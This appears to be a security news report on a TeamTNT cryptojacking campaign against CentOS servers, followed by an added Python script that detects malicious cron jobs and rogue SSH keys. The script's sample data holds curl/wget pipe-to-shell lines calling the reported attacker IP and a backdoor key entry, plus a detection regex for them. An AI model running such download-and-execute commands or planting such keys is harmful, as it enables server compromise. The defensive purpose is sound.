The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting virtual private server (VPS) infrastructure running the CentOS operating system.
“The initial access was accomplished through a brute-force Secure Shell (SSH) attack on the victim’s assets, during which the threat actor downloaded a malicious script,” Group-IB researchers Vito Alfano and Nam Le Phuong said in Wednesday’s report.
The malicious script, the Singapore-based cybersecurity firm noted, is responsible for disabling security features, deleting logs, halting cryptocurrency mining processes, and preventing recovery.
Attack chains ultimately pave the way for the deployment of the Diamorphine rootkit to hide malicious processes, as well as to set up persistent remote access to the compromised host.
The campaign has been attributed to TeamTNT with moderate confidence, citing similarities in the observed tactics, techniques, and procedures (TTPs).
TeamTNT was first discovered in the wild in 2019, carrying out illegal cryptocurrency mining activities by infiltrating cloud and container environments. Although the threat actor said goodbye in November 2021 by announcing a “clean exit”, public reports have since revealed several campaigns carried out by the group since September 2022.
Recent activity associated with the group takes the form of a shell script that first checks whether the device has previously been infected by other hacking operations, then compromises it by disabling SELinux, AppArmor, and the firewall.
Changes have been made to the SSH service
“The script looks for a daemon associated with Alibaba’s cloud provider called aliyun.service,” the researchers said. “When it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to remove the service.”
In addition to stopping all competing cryptocurrency mining processes, the script takes steps to execute a series of commands to remove traces left by other miners, stop container processes, and remove images deployed in association with any coin miners.
It also ensures persistence by setting up cron jobs that download a shell script every 30 minutes from a remote server (65.108.48(.)150), and by modifying the “/root/.ssh/authorized_keys” file to add a backdoor account.
“It locks down the system by changing file attributes, creating a backdoor root user, and erasing the command history to hide its activity,” the researchers noted. “The threat actor leaves nothing to chance; indeed, the script implements various changes to the configuration of the SSH service and the firewall.”
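A host-side check for the two persistence mechanisms described above (a short-interval cron job that downloads and runs a remote script, and an unexpected entry in authorized_keys), written as an added example that is not part of the Group-IB report. The crontab and authorized_keys contents are constructed samples; the remote address is the one the report cites, and the key blobs and allowlist are made up for the demonstration.

```python
import re

# Constructed sample crontab (not from the report); the IP is the one the report cites.
SAMPLE_CRON = """\
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/30 * * * * curl -fsSL http://65.108.48.150/x.sh | bash
*/30 * * * * wget -q -O- http://65.108.48.150/x.sh | sh
"""
# Constructed authorized_keys content; only the first blob is expected.
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIADMINKEYCONSTRUCTED admin@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBACKDOORKEYCONSTRUCTED root@localhost
"""
KNOWN_KEY_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIADMINKEYCONSTRUCTED"}

# "curl|wget ... | sh" or "| bash": download-and-execute on one command line
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def suspicious_cron_entries(crontab, max_interval=60):
    """Flag cron lines that fetch-and-run remote content every max_interval min or less."""
    hits = []
    for line in crontab.splitlines():
        fields = line.strip().split(None, 5)
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        step = re.fullmatch(r"\*/(\d+)", fields[0])  # '*/N' minute field
        if not step or int(step.group(1)) > max_interval:
            continue
        if FETCH_AND_RUN.search(fields[5]):
            hits.append({"interval_min": int(step.group(1)), "command": fields[5]})
    return hits


def unexpected_authorized_keys(content, allowlist):
    """Return 'type comment' for every key entry whose blob is not in allowlist."""
    unexpected = []
    for line in content.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # Entries may start with options (command=..., from=...); the key type is
        # the first token beginning with ssh- or ecdsa-, and the blob follows it.
        for i, tok in enumerate(parts[:-1]):
            if tok.startswith(("ssh-", "ecdsa-")):
                if parts[i + 1] not in allowlist:
                    comment = " ".join(parts[i + 2:]) or "<no comment>"
                    unexpected.append(f"{tok} {comment}")
                break
    return unexpected
```

On a real host, feed the functions the output of `crontab -l` for each user (plus /etc/cron.d) and the contents of each account's authorized_keys file, with the allowlist built from your configuration management.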